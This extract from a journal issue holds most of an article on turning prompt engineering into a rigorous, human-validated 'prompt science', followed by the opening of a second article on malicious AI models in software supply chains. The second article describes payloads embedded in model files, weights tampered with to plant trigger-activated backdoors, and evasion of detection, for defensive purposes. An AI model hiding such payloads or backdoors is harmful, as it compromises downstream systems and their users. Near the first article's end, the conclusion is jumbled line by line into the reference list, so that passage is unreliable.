Figure 1 shows the conceptual flow of a typical prompt revision or engineering process in a research setting. Here, a researcher is interested in getting some input data analyzed or labeled for a downstream application. To get the desired outcomes, the set of instructions—the prompt provided to the LLM—is iteratively revised, an approach used in many recent works.8,16,30,40 While this can be effective, it leaves us with many potential issues. For instance, if the prompt is revised by a single researcher in an ad hoc manner just to fine-tune the output, personal biases and subjectivity may be introduced. If this process is not well-documented, it may be difficult to understand or mitigate these issues. This may also make it more difficult for someone to verify or replicate the process. These issues may hinder scientific progress, which relies on systematic knowledge being generated, questioned, and shared. There may also be issues of feedback loops and self-fulfilling prophecies, which are especially dangerous when we are dealing with highly opaque systems such as LLMs.

Figure 1. A typical flow of prompt engineering for a research process that involves labeling data. [Diagram: Data and a Prompt feed the LLM; its Response feeds the Application; a Revision loop leads back to the Prompt.]

When using LLMs for scientific research, we need some level of reliability, objectivity, and transparency in the process. Specifically, there are three problems we need to address: 1) individual bias and subjectivity, 2) vague criteria for assessment, or bending the criteria to match the LLM's abilities, and 3) a narrow focus on a specific application instead of a general phenomenon. To address these issues, we propose the following steps:
˲ Ensure at least two qualified researchers are involved in the whole process.
˲ Before focusing on revising the prompt to produce desirable outcomes, clearly and objectively articulate what a desirable outcome would be. This will involve establishing a reliable and, if possible, community-validated metric for assessment.
˲ Discuss individual differences and biases with the goal of rooting them out. This will help create assessments and a set of instructions that can be understood and carried out by any researcher with a reasonable set of skills so they can replicate the experiments and achieve similar results.

Though a few recent works have shown promise in addressing these desiderata, they still lack enough rigor to meet the requirements of transparency, objectivity, and replicability. For instance, Shah et al.7 use a verifying method for prompt generation, but their approach lacks verification of criteria as well as replicability for different datasets.

Methodology
In the previous section, we described how a typical prompt-engineering process works; essentially, it involves revising the prompt to an LLM in order to fit the desired response and/or downstream application. We identified that one of the problems with this endeavor is that it is quite ad hoc, unreliable, and not generalizable. Even with enough documentation of how the final prompt was generated, one cannot ensure that the same process will yield the same quality output in a different situation—be it with a different LLM or the same LLM at a different time. To overcome these problems, in this section we describe an approach that first iterates over the criteria for assessing an LLM's response and then iterates over the prompt in a systematic way, using a human in the loop. Our method is inspired by a typical qualitative coding process.

Qualitative coding with multiple assessors. The problem we are trying to address is that of constructing a prompt or a set of instructions that produces desired outcomes for unseen data. This is similar to building a codebook in qualitative research. Take, for instance, the work described in Mitsui et al.17 Here, the authors were attempting to label user behaviors (data) with user intents (discrete labels). For this, they needed to identify a finite (and preferably small) set of labels and their desired descriptions. This is called a codebook.

They began their process with an initial codebook that was inspired by prior work and literature. But then they needed to fine-tune and validate that codebook for the given application, which they addressed by following the qualitative coding process depicted in Figures 2 and 3.

Figure 2. Training portion of qualitative coding. [Diagram: an Instructions/Codebook and Training Data feed two coders, whose Labels are compared for ICR.]

Figure 3. Testing portion of qualitative coding. [Diagram: the revised Instructions/Codebook is applied to Testing Data split between coders (Split 1 and Split 2), each producing Labels.]

As shown in the figures, in a typical qualitative coding process, two researchers who are sufficiently familiar with the task use the initial codebook and a small set of data to independently provide labels during the training portion. The process continues until there is good enough agreement, or inter-coder reliability (ICR), at which point the codebook is considered ready. It can then be used by the same or other researchers to independently and non-overlappingly label unseen data during the testing portion.

It is important to emphasize the value of iterating with a human in the loop. During this process, it is not just the codebook that is getting revised, but also the understanding of the two researchers. Through their discussions of disagreements, they are able to think through the task, the data, and the best ways to describe that data. This enhanced understanding impacts the codebook and vice versa. In other words, this process is used to both produce the desired outcome and help the researchers learn and discover. But this is not just simple brainstorming. The researchers are discussing their differences and charting their way forward bound by a rigorous set of criteria. For instance, in this example, the researchers were aiming to produce a codebook with categories that were clear, concise, comprehensive, and reliable. They had specific definitions of these criteria, which they used during their deliberations. This qualitative coding process ensures that individual subjectivity is dissolved to the extent possible while producing a coding scheme that is robust, verifiable, and explainable.
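The agreement computation at the heart of this process is simple to state. Here is a minimal sketch of percent agreement and Cohen's kappa (a chance-corrected ICR measure), using hypothetical intent labels from two coders:

```python
from collections import Counter

def percent_agreement(a, b):
    """Fraction of items on which two coders assigned the same label."""
    return sum(x == y for x, y in zip(a, b)) / len(a)

def cohens_kappa(a, b):
    """Cohen's kappa: observed agreement corrected for the agreement
    expected by chance from each coder's marginal label frequencies."""
    n = len(a)
    p_o = percent_agreement(a, b)
    ca, cb = Counter(a), Counter(b)
    p_e = sum((ca[label] / n) * (cb[label] / n) for label in set(a) | set(b))
    return (p_o - p_e) / (1 - p_e)

# Hypothetical labels from two coders over six items.
coder1 = ["navigate", "inform", "inform", "transact", "inform", "navigate"]
coder2 = ["navigate", "inform", "transact", "transact", "inform", "navigate"]

print(percent_agreement(coder1, coder2))  # 5/6 ≈ 0.83
print(cohens_kappa(coder1, coder2))       # 0.75
```

When agreement falls below the chosen threshold, the coders deliberate and revise the codebook, as described above, before labeling a fresh sample.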
Codebook building as a way to construct prompts. We will now describe a new method for prompt generation inspired by the qualitative codebook-building process discussed above. Once again, our objective is to generate a prompt for a given LLM in order to achieve a desired response. We also need this prompt to be systematically created, with enough generalizability and explainability to be useful for the same or similar experiments by other researchers, with other LLMs, and at different times. We will describe the abstract process in this section and its operationalization in the next section. To begin, we list two primary desiderata:
˲ The desired response from the LLM must be verified along a set of dimensions and for a large enough sample size by at least two humans.
˲ The prompt must consistently generate the desired responses and must be justifiable, explainable, and verifiable.

To operationalize these two criteria, we propose a multi-phase process, working backward in the pipeline from prompt to application, as shown in Figure 4. This method has four phases.

Figure 4. Proposed methodology with multi-phase approach to response and prompt validations. [Diagram: Data and a Prompt feed the LLM; its Response is checked against Criteria before reaching the Application; the Criteria are informed by literature, prior work, and hypotheses.]

Phase 1: Set up the initial pipeline. This can be done using any reasonable prompt. For instance, the initial prompt could be a simple and direct instruction to generate the desired response.

Phase 2: Identify appropriate criteria to evaluate the responses. Before we can tweak the prompt, it is important to establish that we know how to evaluate the response. Establishing the criteria for assessing the outputs outside of the prompt-tuning process ensures the researchers are focused on the task and not on the LLM's capabilities. A set of appropriate criteria could be obtained from prior work or literature, but these criteria still need to be tested and validated for the given application. Moreover, eventually we will need humans to assess whether the LLM is generating desired responses in order to revise the prompt. For these reasons, we need to execute our first human-in-the-loop assessment, involving the following steps:
˲ Run the existing pipeline to generate a reasonable number of responses. Give each assessor these responses, the existing set of criteria (codebook), and sufficient details about the application. The assessors should review these outcomes and instructions before starting their assessment. This can be supervised by the lead researcher or by an expert. Note that due to the interactive learning and collaboration that takes place among the human assessors (described in the previous section), they do not need special qualifications other than being able to understand the task at hand and discuss their disagreements.
˲ Each assessor applies the criteria to the given responses independently.
˲ Compare the assessors' outcomes and compute the level of agreement. This could be as simple as measuring the percentage of times they agree, or using ICR with an appropriate method, such as Cohen's kappa36 or Krippendorff's alpha.13
˲ If the amount of agreement is not sufficient (this could vary from application to application), bring the assessors together to discuss their disagreement. This is a very important step, as it not only offers an opportunity to remove individual biases and subjectivity, but also influences the researchers' collective understanding of the task and the criteria for evaluation. The discussion could result in both resolution of the conflict and changes to the codebook, which could be about the number or the description of the criteria for assessment. Then, a new set of responses is generated for assessment using the revised codebook and the above process is repeated.
˲ Once a sufficient level of agreement is achieved, the codebook for assessing the responses is finalized. At this point, the assessors may still choose to make minor changes to the codebook to enhance its readability, with the idea that anyone who did not participate in this development process can still understand and use it in much the same way the assessors would.

Phase 3: Iteratively develop the prompt. Continuing to work backward, we now come to the next phase of codebook development, which happens to be the first phase of the pipeline depicted in Figure 4. The objective here is to see if the LLM, with the current version of the prompt, is meeting our criteria for the responses. If not, we need to figure out what changes can be made to the prompt.

At this point, we know what makes a good response from our LLM. More importantly, we have now trained at least two researchers in reasonably, objectively, consistently, and independently evaluating these responses. They can also more effectively assess which instructions can help produce the desired responses. To iteratively develop the prompt, we execute the following steps:
˲ Run a reasonable number of data inputs using the current prompt.
˲ Give the generated responses to the human assessors, ideally the same ones who were involved in the previous phase. These assessors should use the codebook produced in the previous phase to assess the responses.
˲ Have them assess whether the generated responses meet the criteria for the application in question. Compare the assessments by different assessors to find their level of agreement. If that agreement is insufficient, have the assessors discuss their disagreements, possibly under the supervision of a senior researcher or an expert, and revise the codebook as necessary. Here, the codebook is the prompt fed to the LLM. Repeat the above process.
˲ Once there is enough agreement among the assessors that the prompt meets the objective of generating desired responses above some threshold, the process is finished. The assessors or the supervising researcher may still make minor adjustments to the prompt for improved readability, interpretability, and generalization.

Phase 4: Validate the whole pipeline. As an optional final validation phase, run through the whole pipeline using a portion of the test data and evaluate random samples of the responses to ensure the entire process still yields quality results that can be independently and objectively validated. For this, it is ideal to use a different set of assessors and have them independently label that same set of randomly sampled responses. Compute their ICR on this sample to see whether there is good enough agreement among them on labeling, and whether the generated responses are meeting the desired criteria. If either of these objectives is not met, take appropriate corrective actions based on phases 2 and 3.

As one can see, there are multiple checkpoints and validations in this method that ensure removal of ad hocness, subjectivity, and opaqueness as much as possible. Proper documentation of its execution will yield a more informative, meaningful, and scientific communication that can help other researchers trust the outputs as well as test and build these pipelines themselves.
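The iterate-until-agreement loop shared by Phases 2 and 3 can be summarized as a short sketch. Everything here is illustrative: `simulated_labels` stands in for the expensive step of two humans labeling real LLM responses, percent agreement stands in for a proper ICR measure, and the revision step stands in for the assessors' deliberation.

```python
def iterate_until_agreement(artifact, revise, label_with, icr, threshold, max_rounds=20):
    """Generic Phase 2/3 loop: two assessors label outputs produced under
    `artifact` (a criteria codebook in Phase 2, a prompt in Phase 3); if
    inter-coder reliability falls below `threshold`, the artifact is
    revised after deliberation and the loop repeats."""
    for round_no in range(1, max_rounds + 1):
        labels_a, labels_b = label_with(artifact)   # independent labeling
        if icr(labels_a, labels_b) >= threshold:
            return artifact, round_no               # finalized artifact
        artifact = revise(artifact)                 # discuss and revise
    raise RuntimeError("agreement threshold not reached")

def percent_agreement(a, b):
    return sum(x == y for x, y in zip(a, b)) / len(a)

def simulated_labels(version):
    """Stand-in for human assessment: disagreements shrink as the
    (hypothetical) codebook/prompt version improves."""
    disagreements = max(0, 5 - version)
    a = ["meets-criteria"] * 10
    b = ["meets-criteria"] * (10 - disagreements) + ["fails-criteria"] * disagreements
    return a, b

final_version, rounds = iterate_until_agreement(
    1, lambda v: v + 1, simulated_labels, percent_agreement, threshold=0.9)
print(final_version, rounds)  # agreement reaches 90% after a few revisions
```

In a real study, the labeling function would collect judgments from the two assessors and the revision step would be their supervised deliberation, not an automatic update.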
Demonstrations
To demonstrate the methodology explained here, we will now walk through its execution for two specific research applications, resulting from collaborations with two different sets of researchers.

Identifying user intents. One of the common problems in the areas of information retrieval and recommender systems is that of understanding user intents.38 Doing so requires having a taxonomy of user intents and then using this taxonomy to label user queries, questions, or behaviors with appropriate intents. However, as shown by Shah et al.,28 it is very challenging to construct and use these intent taxonomies. Taking one of the existing taxonomies could help with construction, but may not be sufficiently comprehensive or accurate to be applicable. Conversely, creating a customized taxonomy for a given application could help with applicability, but would incur a high cost. LLMs could help in constructing and applying taxonomies, but are faced with the same challenges described in the first section, namely, a lack of reliability and validation, the danger of creating feedback loops, and issues with replicability and generalizability. To overcome these issues, the author, along with a set of collaborators, applied the method proposed here. The following are the specific steps we took based on the pipeline presented in Figure 4 and described in the previous section.

Phase 1: Set up the initial pipeline. A pipeline that included an initial prompt and a small sample of log data from Bing Chat that could create a user-intent taxonomy (zero-shot approach) was set up for initial testing.

Phase 2: Identify appropriate criteria to evaluate the responses. We identified five criteria—comprehensiveness, consistency, clarity, accuracy, and conciseness—for evaluating the quality of a user-intent taxonomy using prior work21 as well as human assessments, as shown in Figure 4.

Phase 3: Iteratively develop the prompt. We first ran the zero-shot approach to obtain the initial taxonomy. Two researchers familiar with the task of creating and using a user-intent taxonomy assessed the generated taxonomy through those five criteria. Appropriate revisions were made in the original prompt and a new sample of data was passed through the LLM (here, GPT4) to create a new version of the taxonomy. The researchers repeated the process until they obtained good agreement (ICR9).

Phase 4: Validate the whole pipeline. Once the taxonomy was finalized (see details in Shah et al.29), we proceeded with the testing phase, in which the LLM was given new data and asked to use the human-validated taxonomy to label user intents. A set of two different researchers independently assigned their own labels using the same taxonomy.

We then compared the labels among the human annotators, as well as between the humans and the LLM, finding high enough ICR for all of them. We repeated this process with two other LLMs—Mistral and Hermes, both open sourced—and found their labeling also had strong agreement with that obtained from GPT4, as well as from the human annotators. This indicated that both the taxonomy and the process for using that taxonomy through an LLM were robust and stable. At this point, we not only had a reasonably reliable and robust pipeline for generating and using a user-intent taxonomy, but it also had been validated through a rigorous process with a human in the loop, making the pipeline considerably trustworthy and generalizable. The details of this work, along with results and their discussions, can be found in Shah et al.29

Auditing an LLM. We now turn to a different type of problem involving LLMs: auditing. While there have been many recent efforts in this area,18,22 we still lack systematic and scientifically rigorous approaches. We attempted to address this using a simple but effective method: posing the same question differently to the given LLM to see how it responds. Different versions of the same question could be generated by humans, but that would hinder scalability. Using an LLM (ideally, one other than the one being audited) could help (as shown in Rastogi et al.22) but, as before, we are faced with the challenge of ensuring that the generation of those probes is reliable, robust, and generalizable. To meet these challenges, we again ran through the method proposed in the codebook-building section above.

Phase 1: Set up the initial pipeline. The initial prompt for the LLM was "Generate five different questions for the following question that represent the same meaning, but are different." We used the Mistral LLM, and the data we used for the original questions came from the TruthfulQA dataset.14
Given the application—generating different versions of the same question for auditing an LLM—we set the criteria for responses generated by Mistral as relevance and diversity.

Phase 2: Identify appropriate criteria to evaluate the responses. We recruited two researchers who understood the application well. Using the existing literature and the task at hand, we determined that a good set of probes will have two important characteristics: relevance, or semantic similarity of each probe with the original question, and adequate diversity among the probes. As the two researchers started independently assessing the generated probes from a small set of data (10 original questions that resulted in 50 probes) and then comparing their labels with each other, two key things happened: They started firming up the definitions of relevance and diversity, and they started getting more agreement in their assessments. We had to go through three rounds of this exercise to finalize our definitions of the two criteria, as well as how to label them.

Phase 3: Iteratively develop the prompt. We wanted to have a prompt that consistently generates outputs (a set of questions) that could achieve high enough relevance and diversity for their use in a downstream application. We set the threshold for this at 75%. The same two researchers marked the generated responses for relevance and diversity using a new set of input data. The initial round of assessment showed that only about 50% of the outcomes met the goal of relevance (medium or high) and diversity. To change this, the original prompt was modified to include more details about the application and the criteria. This process was then repeated. After two more iterations, the LLM was generating outcomes that were relevant and diverse in at least 80% of the cases.

Phase 4: Validate the whole pipeline. A senior researcher tested the whole pipeline with the final versions of the prompt and the criteria with a few rounds of random samplings. They made a few minor adjustments to the prompt for improved readability and generalizability. The details of these experiments, along with a demo, can be found in Amirizaniani et al.1,2
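The pass-rate check used against the 75% bar in Phase 3 above can be sketched as follows. The label structure and the sample values are hypothetical, standing in for the two researchers' actual judgments of relevance (low/medium/high) and diversity:

```python
def probe_set_pass_rate(judgments, min_relevance="medium"):
    """Fraction of probe sets judged sufficiently relevant and diverse.

    `judgments` is a hypothetical structure: one entry per original
    question, holding per-probe relevance labels and a single diversity
    verdict for the whole probe set."""
    order = {"low": 0, "medium": 1, "high": 2}
    passed = 0
    for j in judgments:
        relevant = all(order[r] >= order[min_relevance] for r in j["relevance"])
        if relevant and j["diverse"]:
            passed += 1
    return passed / len(judgments)

# Hypothetical labels for four original questions, three probes each.
sample = [
    {"relevance": ["high", "medium", "high"],   "diverse": True},
    {"relevance": ["high", "low", "high"],      "diverse": True},
    {"relevance": ["medium", "medium", "high"], "diverse": True},
    {"relevance": ["high", "high", "medium"],   "diverse": False},
]
print(probe_set_pass_rate(sample))  # 0.5 -> below the 75% bar, so revise the prompt
```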
Conclusion
LLMs could simply be stochastic string-generation tools5 that are effective at predicting next tokens. But for many researchers, they are proving to be useful in many research problems that involve labeling or classifying input data based on some analysis or reasoning. However, using LLMs blindly for these research tasks, just because their outputs seem reasonable, can be dangerous. It can perpetuate biases,26 create fabricated or hallucinated responses,23 and provide unverifiable results.32 All of these are harmful for scientific progress.

Creatively or iteratively designing prompts to produce desirable outcomes—what is often referred to as prompt engineering—does not address these concerns. In fact, prompt engineering may even worsen the problems by focusing more on bending the process to generate the desired outcomes than on developing a verifiable, validated, and replicable process. In this article, we showed how prompt engineering can be turned into, or aided by, prompt science by introducing a multi-phase process with a human in the loop. Specifically, we divided the prompt-to-application pipeline into two major phases that provide two levels of verification: one for the criteria for evaluating the responses generated by the LLM, and the other for the prompt used to generate the responses. Through a method inspired by qualitative coding for codebook development, we showed how to bring scientific rigor to developing a reliable prompt and getting a trustworthy response for a downstream application. We demonstrated this method in two different applications: generating and using a user-intent taxonomy and auditing an LLM.

We believe there are three main reasons this method provides scientific rigor:
˲ It offers a systematic and scientifically verifiable way of producing prompt templates, while potentially reducing individual subjectivity and biases. Note that the approach itself does not guarantee removal of individual biases. Rather, it promotes counteracting them by engaging multiple researchers in a well-defined process with objective criteria. This is a known benefit of the qualitative coding process.4
˲ Through the involvement of multiple researchers documenting their deliberations and decisions, it fosters openness and replicability. This documentation can and should be made available, much like the code for an open source tool, allowing other researchers to validate, replicate, and extend the work. Engaging multiple researchers in constructing and applying objectively defined labels also helps break the feedback loop or self-fulfilling prophecy in which a single researcher tweaks the prompt to an LLM to achieve desired results.
˲ In addition to producing a prompt template that can generate desired outcomes reliably and consistently, the process also adds to our knowledge about the problem at hand (application), how to best assess what we need for that problem, and how we can consistently and objectively analyze the given data.

This rigorous process comes at a cost. Comparing the typical process of prompt engineering (Figure 1) with the proposed method of prompt science (Figure 4), there is at least a threefold cost increase. Guided deliberations and detailed documentation can also add to the cost. Finally, the optional phase 4 adds a lightweight but more continual …

Acknowledgments
… experiments described in the "Identifying user intents" section are results of collaboration with Ryen White and other researchers from Microsoft, as listed in Shah et al.29 The LLM auditing experiments described in the "Auditing an LLM" section are results of hard work by Maryam Amirizaniani, Adrian Lavergne, Elizabeth Okada, and Jihan Yao. We are also thankful to Aman Chadha and Tanya Roosta for their valuable comments and guidance during this process.

References
1. Amirizaniani, M. et al. AuditLLM: A tool for auditing large language models using multiprobe approach. In Proceedings of the 33rd ACM Intern. Conf. on Information and Knowledge Management. ACM (2024), 5174–5179.
2. Amirizaniani, M. et al. Developing a framework for auditing large language models using human-in-the-loop. arXiv preprint arXiv:2402.09346 (2024).
3. Antu, S.A., Chen, H., and Richards, C.K. Using LLM (Large Language Model) to improve efficiency in literature review for undergraduate research. LLM@AIED (2023), 8–16.
4. Auerbach, C. and Silverstein, L.B. Qualitative Data: An Introduction to Coding and Analysis, Vol. 21. NYU Press (2003).
5. Bender, E.M. et al. On the dangers of stochastic parrots: Can language models be too big? In Proceedings of the 2021 ACM Conf. on Fairness, Accountability, and Transparency. ACM (2021), 610–623.
6. Cain, W. Prompting change: Exploring prompt engineering in large language model AI and its potential to transform education. TechTrends 68, 1 …
19. Paroiu, R. et al. Asking questions about scientific articles—Identifying large N studies with LLMs. Electronics 12, 19 (2023), 3996.
20. Peng, L. et al. Generating efficient training data via LLM-based attribute manipulation. arXiv preprint arXiv:2307.07099 (2023).
21. Raad, J. and Cruz, C. A survey on ontology evaluation methods. In Proceedings of the Intern. Conf. on Knowledge Engineering and Ontology Development, part of the 7th Intern. Joint Conf. on Knowledge Discovery, Knowledge Engineering and Knowledge Management (2015).
22. Rastogi, C. et al. Supporting human-AI collaboration in auditing LLMs with LLMs. In Proceedings of the 2023 AAAI/ACM Conf. on AI, Ethics, and Society. ACM (2023), 913–926.
23. Rawte, V. et al. A survey of hallucination in large foundation models. arXiv preprint arXiv:2309.05922 (2023).
24. Reynolds, L. and McDonell, K. Prompt programming for large language models: Beyond the few-shot paradigm. In Extended Abstracts of the 2021 CHI Conf. on Human Factors in Computing Systems. ACM (2021), 1–7.
25. Sahoo, P. et al. A systematic survey of prompt engineering in large language models: Techniques and applications. arXiv preprint arXiv:2402.07927 (2024); https://arxiv.org/abs/2402.07927
26. Shah, C. and Bender, E.M. Situating search. In Proceedings of the 2022 Conf. on Human Information Interaction and Retrieval. ACM (2022), 221–232.
27. Shah, C. and Bender, E.M. Envisioning information access systems: What makes for good tools and a healthy web? ACM Trans. on the Web 18, 3 (2024), 1–24.
28. Shah, C. et al. Taking search to task. In Proceedings of the 2023 ACM Conf. on Human Information Interaction and Retrieval. ACM (2023), 1–13.
29. Shah, C. et al. Using large language models to generate, validate, and apply user intent taxonomies. ACM Trans. on the Web (forthcoming).
30. Shah, N.H., Entwistle, D., and Pfeffer, M.A. Creation and adoption of large language models in medicine. JAMA 330, 9 (2023), 866–869.
31. Shen, H. et al. Shaping the emerging norms of using …
large language models in social computing research.
cost to the whole pipeline to maintain (2024), 47–57.
In Companion Publication of the 2023 Conf. on
7. Chen, B., Yi, F., and Varró, D. Prompting or fine-tuning?
its quality and validity. We can compare A comparative study of large language models for
Computer Supported Cooperative Work and Social
Computing. ACM (2023), 569–571.
this to an assembly line that is run pri- taxonomy construction. In 2023 ACM/IEEE Intern.
32. Stechly, K., Marquez, M., and Kambhampati, S. GPT-4
Conf. on Model Driven Engineering Languages and
marily through automated processes Systems Companion. IEEE (2023), 588–596.
doesn’t know it’s wrong: An analysis of iterative
prompting for reasoning problems. In NeurIPS 2023
with some human supervision. De- 8. Chew, R. et al. LLM-assisted content analysis: Using
Foundation Models for Decision Making Workshop.
large language models to support deductive coding.
pending on the risk of bad quality and arXiv preprint arXiv:2306.14924 (2023).
33. Strobelt, H. et al. Interactive and visual prompt
engineering for ad hoc task adaptation with large
the cost of the manual quality check, 9. Cohen, J. A coefficient of agreement for nominal
language models. IEEE Trans. on Visualization and
scales. Educational and Psychological Measurement
one could decide how often and how Computer Graphics 29, 1 (2022), 1146–1156.
20, 1 (1960), 37–46.
34. Thomas, P. et al. Large language models can
rigorously humans should be involved. 10. Ding, N. et al. Parameter-efficient fine-tuning of large-
accurately predict searcher preferences. In
scale pre-trained language models. Nature Machine
This then allows us to create more au- Proceedings of the 47th Intern. ACM SIGIR Conf.
Intelligence 5, 3 (2023), 220–235.
on Research and Development in Information. ACM
tomated systems with enough control 11. Gómez-Rodríguez, C. and Williams, P. A Confederacy
(2024), 1930–1940.
of models: A comprehensive evaluation of LLMs on
35. Vert, J.-P. How will generative AI disrupt data science
and quality assurance—going from co- creative writing. In Proceedings of the 2023 Conf. on
in drug discovery? Nature Biotechnology 41, (2023),
Empirical Methods in Natural Language Processing.
pilot to autopilot mode with LLMs. The ACL (2023).
750–751.
36. Warrens, M.J. Five ways to look at Cohen’s kappa. J. of
key, as argued and demonstrated here, 12. Hu, Z. et al. LLM-adapters: An adapter family for
Psychology & Psychotherapy 5 (2015).
parameter-efficient fine-tuning of large language
is to do so with enough human agency models. In Proceedings of the 2023 Conf. on Empirical
37. Ye, Q. et al. Prompt engineering a prompt engineer.
In Findings of the Association for Computational
and scientific rigor. Methods in Natural Language Processing. ACL (2023),
Linguistics. ACL (2024), 355–385.
5254–5276.
Even if the goal is not to create a fully 13. Krippendorff, K. Computing Krippendorff’s alpha-
38. Zhang, P. et al. Efficiently leveraging multi-level user
intent for session-based recommendation via atten-
automated pipeline, considering that reliability. (2011).
mixer network. In Proceedings of the Sixteenth ACM
14. Lin, S., Hilton, J., and Evans, O. TruthfulQA: Measuring
the proposed method not only leads how models mimic human falsehoods. In Proceedings
Intern. Conf. on Web Search and Data Mining. ACM
(2023), 168–176.
to outputs with higher quality, consis- of the 60th Annual Meeting of the Association for
39. Zhao, P. et al. Retrieval-augmented generation for AI-
Computational Linguistics (Volume 1: Long Papers).
tency, and reliability, but also an in- ACL (2022), 3214-3252.
generated content: A survey. CoRR (2024).
40. Ziems, C. et al. Can large language models transform
creased understanding of the task and 15. Lindemann, N.F. Sealed knowledges: A critical
computational social science? Computational
approach to the usage of LLMs as search engines.
the data, we believe the added cost is Linguistics 50, 1 (2023), 1–53.
In Proceedings of the 2023 AAAI/ACM Conf. on AI,
justifiable. The broader scientific com- Ethics, and Society. ACM (2023), 985–986.
16. Ma, P. et al. InsightPilot: An LLM-empowered Chirag Shah ([email protected]) is a professor in the
munity could also benefit from exercis- automated data exploration system. In Proceedings Information School at the University of Washington,
ing and perhaps insisting on such rigor of the 2023 Conf. on Empirical Methods in Natural Seattle, USA.
Language Processing. ACL (2023), 346–352.
so we can leverage LLMs ethically and 17. Mitsui, M., Shah, C., and Belkin, N.J. Extracting
information seeking intentions for web search
responsibly in our research. sessions. In Proceedings of the 39th Intern. ACM
This work is licensed under a Creative
SIGIR Conf. on Research and Development in
Commons Attribution-NonCommercial-
Information Retrieval. ACM (2016), 841–844.
Acknowledgments 18. Mökander, J. et al. Auditing large language models: a
ShareAlike International 4.0 License.
The taxonomy generation and usage three-layered approach. AI and Ethics (2023), 1–31. © 2025 Copyright held by the owner/author(s).
JUNE 2025 | VOL. 68 | NO. 6 | COMMUNICATIONS OF THE ACM 61

research and advances
DOI:10.1145/3704724

Unveiling the dark side.

BY ADITYA K. SOOD AND SHERALI ZEADALLY

Malicious AI Models Undermine Software Supply-Chain Security

key insights
˽ Attackers inject malicious code into AI models hosted on public repositories. These models allow attackers to manipulate or exploit the environment when deployed in software systems.
˽ Incorporating malicious AI models in dependencies or libraries also compromises the integrity of software products downstream.
˽ Organizations need robust processes to validate the origin and integrity of AI models. Organizations should use trusted repositories, cryptographic validation, and controlled access to mitigate risks associated with third-party AI models.

INTEGRATING MALICIOUS AI models6 into software supply chains presents a significant and emerging threat to cybersecurity. The attackers aim to embed harmful code that performs actions such as exfiltrating sensitive data, manipulating data integrity, or enabling unauthorized access to critical systems. Compromised development tools, tampered libraries, and pre-trained models are the primary methods of introducing malicious AI models into the software supply chain. Developers often rely on libraries and frameworks to import pre-trained AI models to expedite software development. Attackers can easily compromise the underlying system if the application consumes pre-trained AI models tainted with malicious code. For instance, the MLOps platform20 fails to detect malicious AI models after scanning the model file containing serialized data. Deploying a malicious AI model would jeopardize the security of the systems and could put end users at risk in some applications.

The sophistication of these malicious AI models allows them to adapt and evade traditional security measures by leveraging their ability to analyze vast amounts of data, learn complex patterns, and generate responses that mimic human behavior. These malicious AI models can simulate diverse attack scenarios, discover previously unknown vulnerabilities, and create evasive techniques that traditional defenses, reliant on predefined signatures and heuristics, struggle to detect. It is also important to note that adversaries can exploit vulnerabilities in the AI framework or the environment when the AI model is deployed, such as weaknesses in deserialization processes or insufficient validation checks. This underscores the need for constant vigilance and proactive measures to secure AI systems.

Integration of AI models without adequate security checks can lead to the execution of unauthorized code. AI models, especially those shared via untrusted sources, may contain embedded malicious code or payloads that can be triggered during execution. Attackers can tamper with the model weights, scripts, or dependencies to insert hidden malware or back doors, allowing for unauthorized code execution once the model is loaded into memory. The absence of robust security checks, sandboxing, or code-integrity verification can lead to arbitrary code execution, underscoring the critical need for stringent security measures.

Detecting and mitigating malicious AI models is challenging due to their complexity and opacity. First, AI models are distributed as opaque files (for example, model weights) containing parameters learned during training. As these parameters can be tampered with, AI models act maliciously when specific triggers are activated, making it challenging to distinguish between a benign and compromised model without deep analysis. Second, AI models rely on external dependencies and frameworks, and attackers can exploit vulnerabilities in these libraries to introduce malicious payloads. Third, AI models are deployed in environments that lack proper validation or isolation mechanisms, allowing malicious code hidden within a model to execute undetected. Several existing solutions aim to address these issues, such as secure model validation to check the integrity of models before they are deployed. Another key solution is to use a secure model serialization format, such as Safetensors,16 for AI models. This format avoids executing embedded code during loading, offering a sense of reassurance about the safety of the AI models. In addition, model watermarking involves embedding models with unique identifiers to verify their source and integrity. Sandboxing models in isolated execution environments is another technique that mitigates the risk of malicious code execution by containing any harmful behavior within a controlled space. Despite these solutions, the constantly evolving nature of AI-based threats makes it essential for organizations to continuously adapt and integrate multiple layers of security, building a holistic approach to defend against malicious AI models. Overall, malicious AI models are programmed to recognize and adapt to different security environments. They can identify patterns in security protocols and learn to avoid detection by mimicking normal system behavior. This adaptability makes them particularly dangerous because they can remain dormant and undetected for extended periods, only activating under specific conditions to execute their malicious payload. This stealthy nature of attacks using AI complicates incident-response efforts because traditional detection methods may not be effective against such advanced cyber threats.

Research contributions of this work. Considering the above, this article makes the following contributions. First, we describe the AI model integration process and discuss threat classification and associated attack payloads. Second, we present a complete attack flow model explaining how attackers use malicious AI models to compromise the target systems. Third, we discuss the limitations of traditional security defenses in restricting the impact of malicious AI models. Fourth, we present granular recommendations that organizations can adopt to strengthen software supply-chain security.

Understanding the AI Model Integration Process
Hosting AI models in a repository is a crucial aspect of modern AI development and deployment.17 The repositories hosting AI models are centralized locations where models, metadata, dependencies, and documentation are stored securely, facilitating easy access and collaboration. The AI models deployed in the repositories are often open source, allowing users to directly deploy them in the production environment or fine-tune those models for specific use cases. By hosting AI models in a repository, organizations can ensure consistency across different stages of development, from training to maintenance, with control over model versions and updates. Repositories such as Hugging Face, TensorFlow Hub, PyTorch Hub, and Model Zoo offer additional features over traditional model-hosting and version-control systems such as GitHub. These features include model discovery; built-in tools for model evaluation and training; integrated inference application programming interfaces (APIs); private model hosting and sharing of pre-trained models; and integration with various machine learning (ML) frameworks.

The AI model integration process involves transferring a pre-trained model from an external source or repository into a local development environment or application for further use or fine-tuning. This process typically starts by selecting the appropriate model from a repository, which provides models in various formats. Once selected, the model is downloaded and loaded into the chosen ML framework, such as TensorFlow or PyTorch, using standardized functions or APIs. During integration, it is crucial to ensure that the model's architecture, dependencies, and input-output configurations are compatible with the existing environment. The model may undergo additional steps, such as fine-tuning on domain-specific data, integration into a larger system, or deployment in a production environment. Understanding the complete AI model integration process is essential to dissect the associated risks and threats. Table 1 presents the workflow of integrating the AI model.

Table 1. Basic workflow for integrating an AI model from the repository.

Choose repository: Select a repository or platform where the desired pre-trained model is hosted. Standard repositories include:
˲ GitHub: A platform for hosting open source projects, including AI models.
˲ Hugging Face Model Hub: A repository for hosting and sharing pre-trained natural language processing models.
˲ TensorFlow Hub: A platform for sharing AI models compatible with the TensorFlow framework.
˲ PyTorch Hub: A repository for sharing AI models compatible with the PyTorch framework.

Identify model: Select the specific model to import from the repository. Hosted models are organized by task, architecture, or domain.

